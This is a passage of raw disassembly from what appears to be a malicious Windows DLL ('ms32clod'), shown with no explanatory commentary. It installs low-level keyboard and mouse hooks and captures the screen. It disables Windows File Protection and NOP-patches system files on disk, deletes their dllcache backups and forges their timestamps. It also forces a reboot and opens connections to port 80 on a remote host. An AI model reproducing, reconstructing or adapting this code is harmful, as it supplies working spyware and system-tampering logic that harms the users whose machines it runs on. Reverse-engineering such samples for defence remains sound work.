loc_10005286: ; CODE XREF: sub_100050D9+1A4�j
mov edx, [ebp+var_30]
mov dword_1003021C, edx
loc_1000528F: ; CODE XREF: sub_100050D9+161�j
mov eax, dword_100281F8
mov [ebp+rc.left], eax
mov ecx, dword_100281FC
mov [ebp+rc.top], ecx
mov edx, [ebp+rc.left]
add edx, 1Eh
mov [ebp+rc.right], edx
mov eax, [ebp+rc.top]
add eax, 12h
mov [ebp+rc.bottom], eax
push 1 ; format
lea ecx, [ebp+rc]
push ecx ; lprc
push 0FFFFFFFFh ; cchText
mov edx, lpchText
push edx ; lpchText
mov eax, hdc
push eax ; hdc
call ds:DrawTextA ; DrawTextA
mov ecx, dword_100281F8
add ecx, 1Eh
mov dword_100281F8, ecx
mov edx, dword_1006A91C
push edx ; h
mov eax, hdc
push eax ; hdc
call ds:SelectObject ; SelectObject
mov ecx, [ebp+var_20]
mov edx, [ecx]
mov [ebp+rc.left], edx
mov eax, [ebp+var_20]
mov ecx, [eax+4]
mov [ebp+rc.top], ecx
mov edx, [ebp+rc.left]
add edx, 0Dh
mov [ebp+rc.right], edx
mov eax, [ebp+rc.top]
add eax, 0Dh
mov [ebp+rc.bottom], eax
mov ecx, dword_1006A904
push ecx
push offset aD_0 ; "%d"
lea edx, [ebp+chText]
push edx ; LPSTR
call ds:wsprintfA ; wsprintfA
add esp, 0Ch
push 1 ; format
lea eax, [ebp+rc]
push eax ; lprc
push 0FFFFFFFFh ; cchText
lea ecx, [ebp+chText]
push ecx ; lpchText
mov edx, hdc
push edx ; hdc
call ds:DrawTextA ; DrawTextA
cmp dword_10037124, 1
jnz short loc_10005359
mov eax, hHandle
push eax ; hEvent
call ds:SetEvent ; SetEvent
loc_10005359: ; CODE XREF: sub_100050D9+24�j
; sub_100050D9+46�j ...
mov ecx, [ebp+lParam]
push ecx ; lParam
mov edx, [ebp+wParam]
push edx ; wParam
mov eax, [ebp+nCode]
push eax ; nCode
mov ecx, hhk
push ecx ; hhk
call ds:CallNextHookEx ; CallNextHookEx
jmp short loc_10005376
; ---------------------------------------------------------------------------
loc_10005374: ; CODE XREF: sub_100050D9+1A�j
xor eax, eax
loc_10005376: ; CODE XREF: sub_100050D9+299�j
mov esp, ebp
pop ebp
retn 0Ch
sub_100050D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_1000537C(LPVOID)
sub_1000537C proc near ; DATA XREF: sub_100050D9+114�o
var_3C = dword ptr -3Ch
Msg = tagMSG ptr -38h
hDC = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
cy = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3Ch
mov eax, [ebp+arg_0]
mov [ebp+var_3C], eax
mov dword_100281F8, 1Eh
mov dword_100281FC, 1Eh
call ds:GetForegroundWindow ; GetForegroundWindow
mov [ebp+var_8], eax
mov ecx, [ebp+var_3C]
mov edx, [ecx]
push edx
call sub_10002F3C
add esp, 4
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_4]
jz short loc_100053CF
mov dword_1006A900, 0
xor eax, eax
jmp loc_10005596
; ---------------------------------------------------------------------------
loc_100053CF: ; CODE XREF: sub_1000537C+40�j
push 0 ; hWnd
call ds:GetDC ; GetDC
mov [ebp+hDC], eax
mov [ebp+var_18], 0
mov [ebp+var_14], 0
push 0 ; nIndex
call ds:GetSystemMetrics ; GetSystemMetrics
mov [ebp+var_10], eax
push 1 ; nIndex
call ds:GetSystemMetrics ; GetSystemMetrics
mov [ebp+cy], eax
mov ecx, [ebp+hDC]
push ecx ; hdc
call ds:CreateCompatibleDC ; CreateCompatibleDC
mov hdc, eax
push 0 ; color
mov edx, hdc
push edx ; hdc
call ds:SetTextColor ; SetTextColor
push 0FFFFFFh ; color
mov eax, hdc
push eax ; hdc
call ds:SetBkColor ; SetBkColor
mov ecx, [ebp+cy]
push ecx ; cy
mov edx, [ebp+var_10]
push edx ; cx
mov eax, [ebp+hDC]
push eax ; hdc
call ds:CreateCompatibleBitmap ; CreateCompatibleBitmap
mov ho, eax
mov ecx, ho
push ecx ; h
mov edx, hdc
push edx ; hdc
call ds:SelectObject ; SelectObject
mov h, eax
push 0CC0020h ; rop
push 0 ; y1
push 0 ; x1
mov eax, [ebp+hDC]
push eax ; hdcSrc
mov ecx, [ebp+cy]
push ecx ; cy
mov edx, [ebp+var_10]
push edx ; cx
push 0 ; y
push 0 ; x
mov eax, hdc
push eax ; hdc
call ds:BitBlt ; BitBlt
mov ecx, [ebp+hDC]
push ecx ; hDC
push 0 ; hWnd
call ds:ReleaseDC ; ReleaseDC
mov rc.left, 14h
mov rc.top, 1Eh
mov rc.right, 320h
mov rc.bottom, 32h
mov edx, hbr
push edx ; hbr
push offset rc ; lprc
mov eax, hdc
push eax ; hDC
call ds:FillRect ; FillRect
cmp hhk, 0
jnz short loc_10005511
push 0 ; dwThreadId
push offset aMs32clod_2 ; "ms32clod"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hmod
push offset sub_100050D9 ; lpfn
push 0Eh ; idHook
call ds:SetWindowsHookExA ; SetWindowsHookExA
mov hhk, eax
cmp hhk, 0
jnz short loc_10005511
mov dword_1006A900, 0
xor eax, eax
jmp loc_10005596
; ---------------------------------------------------------------------------
loc_10005511: ; CODE XREF: sub_1000537C+159�j
; sub_1000537C+182�j
cmp dword_1006A910, 0
jnz short loc_10005551
push 0 ; dwThreadId
push offset aMs32clod_3 ; "ms32clod"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hmod
push offset sub_10004DAA ; lpfn
push 0Dh ; idHook
call ds:SetWindowsHookExA ; SetWindowsHookExA
mov dword_1006A910, eax
cmp dword_1006A910, 0
jnz short loc_10005551
mov dword_1006A900, 0
xor eax, eax
jmp short loc_10005596
; ---------------------------------------------------------------------------
loc_10005551: ; CODE XREF: sub_1000537C+19C�j
; sub_1000537C+1C5�j
push offset TimerFunc ; lpTimerFunc
push 64h ; uElapse
push 0 ; nIDEvent
push 0 ; hWnd
call ds:SetTimer ; SetTimer
mov uIDEvent, eax
loc_10005567: ; CODE XREF: sub_1000537C+213�j
push 0 ; wMsgFilterMax
push 0 ; wMsgFilterMin
push 0 ; hWnd
lea ecx, [ebp+Msg]
push ecx ; lpMsg
call ds:GetMessageA ; GetMessageA
test eax, eax
jz short loc_10005591
lea edx, [ebp+Msg]
push edx ; lpMsg
call ds:TranslateMessage ; TranslateMessage
lea eax, [ebp+Msg]
push eax ; lpMsg
call ds:DispatchMessageA ; DispatchMessageA
jmp short loc_10005567
; ---------------------------------------------------------------------------
loc_10005591: ; CODE XREF: sub_1000537C+1FD�j
mov eax, 1
loc_10005596: ; CODE XREF: sub_1000537C+4E�j
; sub_1000537C+190�j ...
mov esp, ebp
pop ebp
retn 4
sub_1000537C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000559C(LPCSTR lpMultiByteStr)
sub_1000559C proc near ; CODE XREF: .text:1000582E�p
WideCharStr = word ptr -208h
var_8 = dword ptr -8
hModule = dword ptr -4
lpMultiByteStr = dword ptr 8
push ebp
mov ebp, esp
sub esp, 208h
push 100h ; cchWideChar
lea eax, [ebp+WideCharStr]
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
mov ecx, [ebp+lpMultiByteStr]
push ecx ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
call ds:MultiByteToWideChar ; MultiByteToWideChar
push offset aSfc_os_dll ; "sfc_os.dll"
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+hModule], eax
push 5 ; lpProcName
mov edx, [ebp+hModule]
push edx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov [ebp+var_8], eax
push 0FFFFFFFFh
lea eax, [ebp+WideCharStr]
push eax
push 0
call [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_1000559C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_100055F0(LPCSTR lpFileName, char *Str)
sub_100055F0 proc near ; CODE XREF: .text:10005921�p
; .text:10005967�p ...
var_24 = dword ptr -24h
lpBuffer = dword ptr -20h
nNumberOfBytesToRead= dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
hObject = dword ptr -0Ch
NumberOfBytesRead= dword ptr -8
Dest = byte ptr -4
var_3 = word ptr -3
lpFileName = dword ptr 8
Str = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
mov [ebp+var_10], 0
mov [ebp+var_18], 0
mov [ebp+Dest], 0
xor eax, eax
mov [ebp+var_3], ax
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 80000000h ; dwDesiredAccess
mov ecx, [ebp+lpFileName]
push ecx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz loc_10005794
push 0 ; lpFileSizeHigh
mov edx, [ebp+hObject]
push edx ; hFile
call ds:GetFileSize ; GetFileSize
mov [ebp+nNumberOfBytesToRead], eax
mov eax, [ebp+nNumberOfBytesToRead]
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpBuffer], eax
push 0 ; lpOverlapped
lea ecx, [ebp+NumberOfBytesRead]
push ecx ; lpNumberOfBytesRead
mov edx, [ebp+nNumberOfBytesToRead]
push edx ; nNumberOfBytesToRead
mov eax, [ebp+lpBuffer]
push eax ; lpBuffer
mov ecx, [ebp+hObject]
push ecx ; hFile
call ds:ReadFile ; ReadFile
mov edx, [ebp+hObject]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
loc_10005675: ; CODE XREF: sub_100055F0+17D�j
mov eax, [ebp+var_10]
cmp eax, [ebp+nNumberOfBytesToRead]
jge loc_10005772
mov [ebp+var_14], 0
jmp short loc_10005693
; ---------------------------------------------------------------------------
loc_1000568A: ; CODE XREF: sub_100055F0+14E�j
mov ecx, [ebp+var_14]
add ecx, 2
mov [ebp+var_14], ecx
loc_10005693: ; CODE XREF: sub_100055F0+98�j
mov edx, [ebp+Str]
push edx ; Str
call strlen ; strlen
add esp, 4
cmp [ebp+var_14], eax
jnb loc_10005743
push 2 ; Count
mov eax, [ebp+Str]
add eax, [ebp+var_14]
push eax ; Source
lea ecx, [ebp+Dest]
push ecx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
loc_100056BE: ; CODE XREF: sub_100055F0+10B�j
push offset asc_10022968 ; "**"
lea edx, [ebp+Dest]
push edx ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_100056FD
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
mov ecx, [ebp+var_14]
add ecx, 2
mov [ebp+var_14], ecx
push 2 ; Count
mov edx, [ebp+Str]
add edx, [ebp+var_14]
push edx ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
jmp short loc_100056BE
; ---------------------------------------------------------------------------
loc_100056FD: ; CODE XREF: sub_100055F0+E1�j
lea ecx, [ebp+Dest]
push ecx ; Str
call sub_10002881
add esp, 4
mov byte ptr [ebp+var_24], al
mov edx, [ebp+var_24]
and edx, 0FFh
mov eax, [ebp+lpBuffer]
add eax, [ebp+var_10]
xor ecx, ecx
mov cl, [eax]
cmp edx, ecx
jnz short loc_1000572E
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_10], edx
jmp short loc_10005737
; ---------------------------------------------------------------------------
loc_1000572E: ; CODE XREF: sub_100055F0+131�j
mov [ebp+var_18], 1
jmp short loc_10005743
; ---------------------------------------------------------------------------
loc_10005737: ; CODE XREF: sub_100055F0+13C�j
mov [ebp+var_18], 0
jmp loc_1000568A
; ---------------------------------------------------------------------------
loc_10005743: ; CODE XREF: sub_100055F0+B2�j
; sub_100055F0+145�j
mov eax, [ebp+Str]
push eax ; Str
call strlen ; strlen
add esp, 4
cmp [ebp+var_14], eax
jb short loc_1000575D
mov [ebp+var_18], 1
jmp short loc_10005772
; ---------------------------------------------------------------------------
loc_1000575D: ; CODE XREF: sub_100055F0+162�j
mov [ebp+var_18], 0
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
jmp loc_10005675
; ---------------------------------------------------------------------------
loc_10005772: ; CODE XREF: sub_100055F0+8B�j
; sub_100055F0+16B�j
cmp [ebp+var_18], 0
jz short loc_1000578F
mov edx, [ebp+Str]
push edx ; Str
call strlen ; strlen
add esp, 4
shr eax, 1
mov ecx, [ebp+var_10]
sub ecx, eax
mov eax, ecx
jmp short loc_10005797
; ---------------------------------------------------------------------------
loc_1000578F: ; CODE XREF: sub_100055F0+186�j
or eax, 0FFFFFFFFh
jmp short loc_10005797
; ---------------------------------------------------------------------------
loc_10005794: ; CODE XREF: sub_100055F0+3E�j
or eax, 0FFFFFFFFh
loc_10005797: ; CODE XREF: sub_100055F0+19D�j
; sub_100055F0+1A2�j
mov esp, ebp
pop ebp
retn
sub_100055F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000579B proc near ; CODE XREF: sub_1000A318+9E6�p
; sub_1000A318+A0B�p
TokenHandle = dword ptr -14h
NewState = _TOKEN_PRIVILEGES ptr -10h
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+TokenHandle]
push eax ; TokenHandle
push 20h ; DesiredAccess
call ds:GetCurrentProcess ; GetCurrentProcess
push eax ; ProcessHandle
call ds:OpenProcessToken ; OpenProcessToken
lea ecx, [ebp+NewState.Privileges]
push ecx ; lpLuid
push offset Name ; "SeShutdownPrivilege"
push 0 ; lpSystemName
call ds:LookupPrivilegeValueA ; LookupPrivilegeValueA
mov [ebp+NewState.PrivilegeCount], 1
mov [ebp+NewState.Privileges.Attributes], 2
push 0 ; ReturnLength
push 0 ; PreviousState
push 0 ; BufferLength
lea edx, [ebp+NewState]
push edx ; NewState
push 0 ; DisableAllPrivileges
mov eax, [ebp+TokenHandle]
push eax ; TokenHandle
call ds:AdjustTokenPrivileges ; AdjustTokenPrivileges
push 0 ; dwReason
push 2 ; uFlags
call ds:ExitWindowsEx ; ExitWindowsEx
mov esp, ebp
pop ebp
retn
sub_1000579B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 344h
push edi
mov dword ptr [ebp-238h], 0
mov dword ptr [ebp-33Ch], 0
push 0
call ds:time ; time
add esp, 4
push eax
call ds:srand ; srand
add esp, 4
mov eax, [ebp+8]
push eax
call sub_1000559C
add esp, 4
push 0FFh
lea ecx, [ebp-234h]
push ecx
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
mov edx, [ebp+8]
push edx
lea eax, [ebp-234h]
push eax
push offset aSS_1 ; "%s\\%s"
lea ecx, [ebp-338h]
push ecx
call ds:sprintf ; sprintf
add esp, 10h
push 0
push 0
push 3
push 0
push 0
push 80000000h
lea edx, [ebp-338h]
push edx
call ds:CreateFileA ; CreateFileA
mov [ebp-34h], eax
push 0
mov eax, [ebp-34h]
push eax
call ds:GetFileSize ; GetFileSize
mov [ebp-340h], eax
mov ecx, [ebp-340h]
push ecx
call ds:malloc ; malloc
add esp, 4
mov [ebp-0Ch], eax
push 0
lea edx, [ebp-30h]
push edx
mov eax, [ebp-340h]
push eax
mov ecx, [ebp-0Ch]
push ecx
mov edx, [ebp-34h]
push edx
call ds:ReadFile ; ReadFile
lea eax, [ebp-8]
push eax
push 0
push 0
mov ecx, [ebp-34h]
push ecx
call ds:GetFileTime ; GetFileTime
mov edx, [ebp-34h]
push edx
call ds:CloseHandle ; CloseHandle
mov eax, [ebp-340h]
mov [ebp-344h], eax
cmp dword ptr [ebp-344h], 20600h
jz short loc_1000595B
cmp dword ptr [ebp-344h], 20800h
jz short loc_1000595B
cmp dword ptr [ebp-344h], 22400h
jz short loc_10005915
jmp short loc_10005994
; ---------------------------------------------------------------------------
loc_10005915: ; CODE XREF: .text:10005911�j
push offset a83f89d33c040a3 ; "83f89d****33c040a3"
lea ecx, [ebp-338h]
push ecx
call sub_100055F0
add esp, 8
mov [ebp-33Ch], eax
mov edx, [ebp-0Ch]
add edx, [ebp-33Ch]
mov byte ptr [edx+5], 90h
mov eax, [ebp-0Ch]
add eax, [ebp-33Ch]
mov byte ptr [eax+6], 90h
mov ecx, [ebp-0Ch]
add ecx, [ebp-33Ch]
mov byte ptr [ecx+7], 90h
jmp loc_10005AD5
; ---------------------------------------------------------------------------
loc_1000595B: ; CODE XREF: .text:100058F9�j
; .text:10005905�j
push offset a83f89d8bc6a3 ; "83f89d****8bc6a3"
lea edx, [ebp-338h]
push edx
call sub_100055F0
add esp, 8
mov [ebp-33Ch], eax
mov eax, [ebp-0Ch]
add eax, [ebp-33Ch]
mov byte ptr [eax+5], 90h
mov ecx, [ebp-0Ch]
add ecx, [ebp-33Ch]
mov byte ptr [ecx+6], 90h
jmp loc_10005AD5
; ---------------------------------------------------------------------------
loc_10005994: ; CODE XREF: .text:10005913�j
push offset aSfc_os_ ; "sfc_os."
lea edx, [ebp-338h]
push edx
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz loc_10005A3F
push offset a83f89d33c040_0 ; "83f89d****33c040a3"
lea eax, [ebp-338h]
push eax
call sub_100055F0
add esp, 8
mov [ebp-33Ch], eax
cmp dword ptr [ebp-33Ch], 0FFFFFFFFh
jz short loc_100059FD
mov ecx, [ebp-0Ch]
add ecx, [ebp-33Ch]
mov byte ptr [ecx+5], 90h
mov edx, [ebp-0Ch]
add edx, [ebp-33Ch]
mov byte ptr [edx+6], 90h
mov eax, [ebp-0Ch]
add eax, [ebp-33Ch]
mov byte ptr [eax+7], 90h
jmp short loc_10005A3A
; ---------------------------------------------------------------------------
loc_100059FD: ; CODE XREF: .text:100059D2�j
push offset a83f89d8bc6a3_0 ; "83f89d****8bc6a3"
lea ecx, [ebp-338h]
push ecx
call sub_100055F0
add esp, 8
mov [ebp-33Ch], eax
cmp dword ptr [ebp-33Ch], 0FFFFFFFFh
jz short loc_10005A3A
mov edx, [ebp-0Ch]
add edx, [ebp-33Ch]
mov byte ptr [edx+5], 90h
mov eax, [ebp-0Ch]
add eax, [ebp-33Ch]
mov byte ptr [eax+6], 90h
loc_10005A3A: ; CODE XREF: .text:100059FB�j
; .text:10005A1E�j
jmp loc_10005AD5
; ---------------------------------------------------------------------------
loc_10005A3F: ; CODE XREF: .text:100059AB�j
push offset a838dFfff20 ; "838d****ffff20"
lea ecx, [ebp-338h]
push ecx
call sub_100055F0
add esp, 8
mov [ebp-33Ch], eax
cmp dword ptr [ebp-33Ch], 0FFFFFFFFh
jz short loc_10005A8B
mov edx, [ebp-0Ch]
add edx, [ebp-33Ch]
mov byte ptr [edx-2], 90h
mov eax, [ebp-0Ch]
add eax, [ebp-33Ch]
mov byte ptr [eax-1], 90h
mov ecx, [ebp-0Ch]
add ecx, [ebp-33Ch]
mov byte ptr [ecx+6], 1
jmp short loc_10005AD5
; ---------------------------------------------------------------------------
loc_10005A8B: ; CODE XREF: .text:10005A60�j
push offset a834d20 ; "834D**20"
lea edx, [ebp-338h]
push edx
call sub_100055F0
add esp, 8
mov [ebp-33Ch], eax
cmp dword ptr [ebp-33Ch], 0FFFFFFFFh
jz short loc_10005AD5
mov eax, [ebp-0Ch]
add eax, [ebp-33Ch]
mov byte ptr [eax-2], 90h
mov ecx, [ebp-0Ch]
add ecx, [ebp-33Ch]
mov byte ptr [ecx-1], 90h
mov edx, [ebp-0Ch]
add edx, [ebp-33Ch]
mov byte ptr [edx+3], 1
loc_10005AD5: ; CODE XREF: .text:10005956�j
; .text:1000598F�j ...
mov eax, [ebp+8]
push eax
lea ecx, [ebp-234h]
push ecx
push offset aSDllcacheS ; "%s\\dllcache\\%s"
lea edx, [ebp-134h]
push edx
call ds:sprintf ; sprintf
add esp, 10h
lea eax, [ebp-134h]
push eax
call ds:DeleteFileA ; DeleteFileA
mov byte ptr [ebp-2Ch], 0
mov ecx, 7
xor eax, eax
lea edi, [ebp-2Bh]
rep stosd
stosw
stosb
push 7
mov ecx, off_10022114
push ecx
lea edx, [ebp-2Ch]
push edx
call sub_1000274A
add esp, 0Ch
push offset a_tmp ; ".tmp"
lea eax, [ebp-2Ch]
push eax
call strcat ; strcat
add esp, 8
lea ecx, [ebp-2Ch]
push ecx
lea edx, [ebp-234h]
push edx
push offset aSS_2 ; "%s\\%s"
lea eax, [ebp-134h]
push eax
call ds:sprintf ; sprintf
add esp, 10h
lea ecx, [ebp-134h]
push ecx
lea edx, [ebp-338h]
push edx
call ds:MoveFileA ; MoveFileA
push 0
push 80h
push 2
push 0
push 2
push 40000000h
lea eax, [ebp-338h]
push eax
call ds:CreateFileA ; CreateFileA
mov [ebp-34h], eax
push 0
lea ecx, [ebp-30h]
push ecx
mov edx, [ebp-340h]
push edx
mov eax, [ebp-0Ch]
push eax
mov ecx, [ebp-34h]
push ecx
call ds:WriteFile ; WriteFile
lea edx, [ebp-8]
push edx
lea eax, [ebp-8]
push eax
lea ecx, [ebp-8]
push ecx
mov edx, [ebp-34h]
push edx
call ds:SetFileTime ; SetFileTime
mov eax, [ebp-34h]
push eax
call ds:CloseHandle ; CloseHandle
mov ecx, [ebp-0Ch]
push ecx
call ds:free ; free
add esp, 4
mov eax, 1
pop edi
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10005BE3(LPCSTR lpString2)
sub_10005BE3 proc near ; CODE XREF: sub_1000B7EF+159�p
; sub_10016C4C+1D7�p
var_314 = dword ptr -314h
var_310 = dword ptr -310h
s = dword ptr -30Ch
hostshort = word ptr -308h
name = byte ptr -304h
var_303 = byte ptr -303h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
type = dword ptr -1C0h
WSAData = WSAData ptr -1BCh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
Dst = word ptr -20h
var_1E = word ptr -1Eh
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
lpString2 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_10005BE3
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
sub esp, 304h
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov [ebp+hostshort], 50h
mov [ebp+type], 1
mov [ebp+s], 0
mov [ebp+name], 0
mov ecx, 0Fh
xor eax, eax
lea edi, [ebp+var_303]
rep stosd
stosw
stosb
mov eax, [ebp+lpString2]
push eax ; lpString2
lea ecx, [ebp+name]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push 2Fh ; Val
lea edx, [ebp+name]
push edx ; Str
call ds:strchr ; strchr
add esp, 8
test eax, eax
jz short loc_10005C7A
push 2Fh ; Val
lea eax, [ebp+name]
push eax ; Str
call ds:strchr ; strchr
add esp, 8
mov byte ptr [eax], 0
loc_10005C7A: ; CODE XREF: sub_10005BE3+80�j
lea ecx, [ebp+WSAData]
push ecx ; lpWSAData
push 202h ; wVersionRequested
call ds:WSAStartup ; WSAStartup
mov [ebp+var_2C4], 0
mov [ebp+var_2C], 0
mov [ebp+var_28], 989680h
mov [ebp+var_4], 0
lea edx, [ebp+name]
push edx ; name
call ds:gethostbyname ; gethostbyname
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jnz short loc_10005CCD
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10005E3D
; ---------------------------------------------------------------------------
loc_10005CCD: ; CODE XREF: sub_10005BE3+DC�j
push 10h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov ecx, [ebp+var_24]
movsx edx, word ptr [ecx+0Ah]
push edx ; Size
mov eax, [ebp+var_24]
mov ecx, [eax+0Ch]
mov edx, [ecx]
push edx ; Src
lea eax, [ebp+var_1C]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov ecx, [ebp+var_24]
mov dx, [ecx+8]
mov [ebp+Dst], dx
mov ax, [ebp+hostshort]
push eax ; hostshort
call ds:htons ; htons
mov [ebp+var_1E], ax
push 0 ; protocol
mov ecx, [ebp+type]
push ecx ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0
jnb short loc_10005D43
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10005E3D
; ---------------------------------------------------------------------------
loc_10005D43: ; CODE XREF: sub_10005BE3+152�j
; sub_10005BE3+1DF�j
mov [ebp+var_310], 0
jmp short loc_10005D5E
; ---------------------------------------------------------------------------
loc_10005D4F: ; CODE XREF: sub_10005BE3:loc_10005D83�j
mov edx, [ebp+var_310]
add edx, 1
mov [ebp+var_310], edx
loc_10005D5E: ; CODE XREF: sub_10005BE3+16A�j
mov eax, [ebp+var_310]
cmp eax, [ebp+var_2C4]
jnb short loc_10005D85
mov ecx, [ebp+var_310]
mov edx, [ebp+ecx*4+var_2C0]
cmp edx, [ebp+s]
jnz short loc_10005D83
jmp short loc_10005D85
; ---------------------------------------------------------------------------
loc_10005D83: ; CODE XREF: sub_10005BE3+19C�j
jmp short loc_10005D4F
; ---------------------------------------------------------------------------
loc_10005D85: ; CODE XREF: sub_10005BE3+187�j
; sub_10005BE3+19E�j
mov eax, [ebp+var_310]
cmp eax, [ebp+var_2C4]
jnz short loc_10005DBE
cmp [ebp+var_2C4], 40h
jnb short loc_10005DBE
mov ecx, [ebp+var_310]
mov edx, [ebp+s]
mov [ebp+ecx*4+var_2C0], edx
mov eax, [ebp+var_2C4]
add eax, 1
mov [ebp+var_2C4], eax
loc_10005DBE: ; CODE XREF: sub_10005BE3+1AE�j
; sub_10005BE3+1B7�j
xor ecx, ecx
test ecx, ecx
jnz loc_10005D43
push 10h ; namelen
lea edx, [ebp+Dst]
push edx ; name
mov eax, [ebp+s]
push eax ; s
call ds:connect ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_10005DE9
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_10005E3D
; ---------------------------------------------------------------------------
loc_10005DE9: ; CODE XREF: sub_10005BE3+1FB�j
jmp short loc_10005E19
; ---------------------------------------------------------------------------
loc_10005DEB: ; DATA XREF: .rdata:stru_1001FD98�o
cmp [ebp+s], 0
jz short loc_10005E01
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
loc_10005E01: ; CODE XREF: sub_10005BE3+20F�j
mov [ebp+var_314], 0
mov eax, offset loc_10005E11
retn
; ---------------------------------------------------------------------------
loc_10005E11: ; DATA XREF: sub_10005BE3+228�o
mov eax, [ebp+var_314]
jmp short loc_10005E55
; ---------------------------------------------------------------------------
loc_10005E19: ; CODE XREF: sub_10005BE3:loc_10005DE9�j
mov [ebp+var_4], 0FFFFFFFFh
cmp [ebp+s], 0
jz short loc_10005E36
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
loc_10005E36: ; CODE XREF: sub_10005BE3+244�j
mov eax, 1
jmp short loc_10005E55
; ---------------------------------------------------------------------------
loc_10005E3D: ; CODE XREF: sub_10005BE3+E5�j
; sub_10005BE3+15B�j ...
cmp [ebp+s], 0
jz short loc_10005E53
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
loc_10005E53: ; CODE XREF: sub_10005BE3+261�j
xor eax, eax
loc_10005E55: ; CODE XREF: sub_10005BE3+234�j
; sub_10005BE3+258�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_10005BE3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10005E66(LPCSTR lpString2, LPCVOID lpBuffer, LPCSTR lpFileName, char *Source, int)
sub_10005E66 proc near ; CODE XREF: sub_1000A318+5C9�p
; sub_10010623+1EE�p ...
var_308 = dword ptr -308h
var_304 = dword ptr -304h
s = dword ptr -300h
hostshort = word ptr -2FCh
name = dword ptr -2F8h
Size = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
Str = dword ptr -2ECh
readfds = fd_set ptr -2E8h
type = dword ptr -1E4h
WSAData = WSAData ptr -1E0h
var_50 = dword ptr -50h
timeout = timeval ptr -4Ch
nNumberOfBytesToWrite= dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
hObject = dword ptr -38h
NumberOfBytesWritten= dword ptr -34h
lpString1 = dword ptr -30h
Src = dword ptr -2Ch
var_28 = dword ptr -28h
Memory = dword ptr -24h
Dst = word ptr -20h
var_1E = word ptr -1Eh
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
lpString2 = dword ptr 8
lpBuffer = dword ptr 0Ch
lpFileName = dword ptr 10h
Source = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_10005E66
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
sub esp, 2F8h
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov [ebp+hostshort], 50h
mov [ebp+Size], 0
mov [ebp+nNumberOfBytesToWrite], 0
mov [ebp+var_40], 0
mov [ebp+var_50], 0
mov [ebp+s], 0
mov [ebp+var_2F0], 0
mov eax, [ebp+lpString2]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 0FFh
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+name], eax
mov ecx, [ebp+lpString2]
push ecx ; lpString
